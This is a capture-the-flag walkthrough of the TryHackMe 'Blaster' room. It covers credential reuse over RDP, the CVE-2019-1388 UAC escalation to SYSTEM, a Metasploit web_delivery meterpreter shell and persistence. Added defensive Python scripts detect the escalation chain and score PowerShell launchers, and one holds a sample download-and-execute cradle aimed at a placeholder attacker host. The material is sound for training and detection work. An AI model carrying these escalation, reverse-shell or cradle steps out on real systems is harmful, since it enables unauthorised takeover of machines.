Blaster - TryHackMe Writeup
The link for this lab is located here: https://tryhackme.com/room/blaster
Throughout this room, we'll be looking at alternative modes of exploitation without the use of Metasploit or really exploitation tools in general beyond nmap and dirbuster.
Full Walkthrough
The first thing we do is run an Nmap scan on all the ports to determine the open ports with the following parameters:
-p- for all ports
10.10.105.65 for the target IP
-oN allports.scan to output to a file
This shows that two ports are open - 80 (HTTP) and 3389 (RDP). With this information, we can perform a more detailed scan to enumerate the services a bit more.
We get some information back but not a lot. We see that port 80 is running an IIS Windows Server.
The first thing we can do is check what the website is running.
The static IIS default page exists - there’s no real website here. As we don’t know any credentials for the RDP service, we can begin to enumerate the website more.
For starters, we can run a directory busting tool like Feroxbuster to try and identify hidden directories.
This returns a hidden directory - /retro. Let’s check it out!
This looks more like a website - something like a blog site. Looking at the main page, there is something that immediately stands out to me - the author of the first blog post.
Here, we can see that someone called “Wade” is writing these blog posts - could this be a potential username?
To enumerate further, we can click on the name to see his profile.
We can see all the blog posts that this user has made. Clicking through each one, there is an interesting comment on the “Ready Player One” post.
It looks like Wade left himself a note of “parzival” - this to me looks like a password. With these potential credentials, we can try and find a login page.
At the bottom of the site, we see the following:
It’s a link to a login panel. Clicking it reveals a WordPress login panel.
Using the credentials we found - wade:parzival - we can attempt to log in.
It works and we get access to the WordPress admin panel. From here, there are tons of malicious things we can do (e.g. a reverse shell).
However, as credential reuse is one of the main offenders in the security world, what happens if we try these same credentials on the RDP service running?
Bingo! We get a nice GUI interface and we have access to the user’s desktop immediately. On the desktop, we can see the user.txt flag which we can open and submit.
From here, there is an interesting file sitting on the desktop - an executable titled “hhupd” which seems abnormal.
Googling this program shows that it relates to CVE-2019-1388. More importantly, this vulnerability relates to privilege escalation - juicy!
Further research shows that it allows an attacker to elevate privileges to SYSTEM easily.
I found a good GitHub page that details the steps we need to do in order to elevate our privileges.
First, we need to run the program (i.e. hhupd.exe) so that the UAC prompt pops up.
Once UAC is popped, we click on “Show more details” and the following appears.
Once we click that, it takes us to the certificate properties with a link in the “Issued by” section.
Clicking this link opens an Internet Explorer page running as the SYSTEM user. Once it has opened, we can close the UAC prompt.
To abuse this, we can save this page, which opens a File Explorer dialog.
An error appears which we can ignore.
Then, to get a shell, we can navigate to C:\Windows\System32 to list out all the files inside - including cmd.exe.
Once we are in that directory and have found the cmd.exe executable, we can right-click it and select “Open”.
This spawns a shell running as NT AUTHORITY\SYSTEM. We have successfully elevated our privileges.
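The chain above leaves a distinctive trail in process-creation telemetry: the UAC prompt process (consent.exe) launches Internet Explorer as NT AUTHORITY\SYSTEM, and a shell appears beneath that browser. The following detection logic is an added example, not part of the original writeup; the events are constructed, simplified Sysmon-style records, and the exact parent/child layout is an assumption about how this abuse typically shows up.

```python
"""Detect the CVE-2019-1388 process chain in process-creation telemetry:
iexplore.exe running as SYSTEM with consent.exe as its parent, followed by
a shell spawned somewhere beneath that browser.
Sample events are constructed (pid, ppid, image, user); not real telemetry."""

SYSTEM_USER = r"NT AUTHORITY\SYSTEM"

# Constructed sample telemetry: a suspicious chain plus benign noise
EVENTS = [
    (400, 300, r"C:\Windows\System32\consent.exe", SYSTEM_USER),
    (412, 400, r"C:\Program Files\Internet Explorer\iexplore.exe", SYSTEM_USER),
    (433, 412, r"C:\Windows\System32\cmd.exe", SYSTEM_USER),
    # a normal user browsing and opening a prompt: should not alert
    (500, 100, r"C:\Program Files\Internet Explorer\iexplore.exe", r"BLASTER\wade"),
    (510, 500, r"C:\Windows\System32\cmd.exe", r"BLASTER\wade"),
]


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_uac_browser_chains(events):
    """Return [(browser_pid, [shell pids])] for every iexplore.exe running as
    SYSTEM whose parent is consent.exe, listing cmd/powershell descendants."""
    by_pid = {pid: (ppid, img, user) for pid, ppid, img, user in events}
    children = {}
    for pid, ppid, _, _ in events:
        children.setdefault(ppid, []).append(pid)
    hits = []
    for pid, (ppid, img, user) in by_pid.items():
        if basename(img) != "iexplore.exe" or user != SYSTEM_USER:
            continue
        parent = by_pid.get(ppid)
        if parent is None or basename(parent[1]) != "consent.exe":
            continue
        # walk all descendants of the SYSTEM browser looking for a shell
        shells, stack = [], list(children.get(pid, []))
        while stack:
            child = stack.pop()
            if basename(by_pid[child][1]) in ("cmd.exe", "powershell.exe"):
                shells.append(child)
            stack.extend(children.get(child, []))
        hits.append((pid, sorted(shells)))
    return hits


if __name__ == "__main__":
    for browser_pid, shells in find_uac_browser_chains(EVENTS):
        print(f"SYSTEM iexplore.exe pid={browser_pid} under consent.exe; shells={shells}")
```

A SYSTEM-level browser under consent.exe is already worth an alert on its own; the shell descendants just confirm the abuse succeeded.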
From here, we can try and get a better shell like Meterpreter or even a C2 Framework like Cobalt Strike or Sliver. For this, I will simply use Metasploit.
We can first enumerate to see what antivirus is being used - in this case, it is simply Windows Defender and it is turned on.
Next, we can start the Metasploit Framework by running “msfconsole”.
Then, instead of just putting an executable on the Desktop, we can utilize the web_delivery module that generates a command for us that we can run on the target system.
First, we change the target to PSH (PowerShell) as we are on a Windows machine so Python probably is not installed.
Then, we set the LHOST (our machine) and LPORT.
Finally, we set the PAYLOAD to a simple meterpreter reverse HTTP shell.
To generate the command, we simply run it and it spits out this long PowerShell command that we can execute.
Going back to the SYSTEM command prompt we have through the RDP session and running the command opens up a Meterpreter session for us.
Then, we can hop into it by typing “sessions -i 1”. As you can see, it is running as the SYSTEM user meaning we have full access.
Finally, if we wanted persistence, we could simply run “run persistence -X” through the meterpreter shell which would provide us persistence if the machine was to go down or get rebooted.
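The web_delivery launcher described above is the kind of PowerShell command line a defender wants to catch: hidden window, no profile, and a Base64 -EncodedCommand that unwraps to a download cradle. The scorer below is an added example, not code from the original writeup or from Metasploit; the sample command lines are constructed, the cradle text is an assumed typical shape rather than output captured from the room, and the host is a placeholder.

```python
"""Score PowerShell command lines for web_delivery-style launcher traits.
Sample command lines are constructed; the decoded cradle is an assumed shape."""
import base64
import re


def encode_ps(script):
    """Build the UTF-16LE Base64 blob that powershell -e expects (sample data only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample process command lines (ATTACKER_PLACEHOLDER is not a real host)
SAMPLES = [
    "powershell.exe -nop -w hidden -e " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_PLACEHOLDER/x')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -EncodedCommand " + encode_ps("Get-ChildItem C:\\Users"),
]

CRADLE = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|iwr|iex)", re.I)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_launcher(cmdline):
    """Return the list of launcher indicators present; two or more merits an alert."""
    hits = []
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I):
        hits.append("hidden_window")
    if re.search(r"-no(?:p|profile)\b", cmdline, re.I):
        hits.append("no_profile")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
        if CRADLE.search(decoded):
            hits.append("download_cradle")
    return hits


if __name__ == "__main__":
    for line in SAMPLES:
        print(score_launcher(line), line[:60])
```

Pair this with Script Block Logging (Event ID 4104), which records the decoded script even when the command line only shows the Base64 blob.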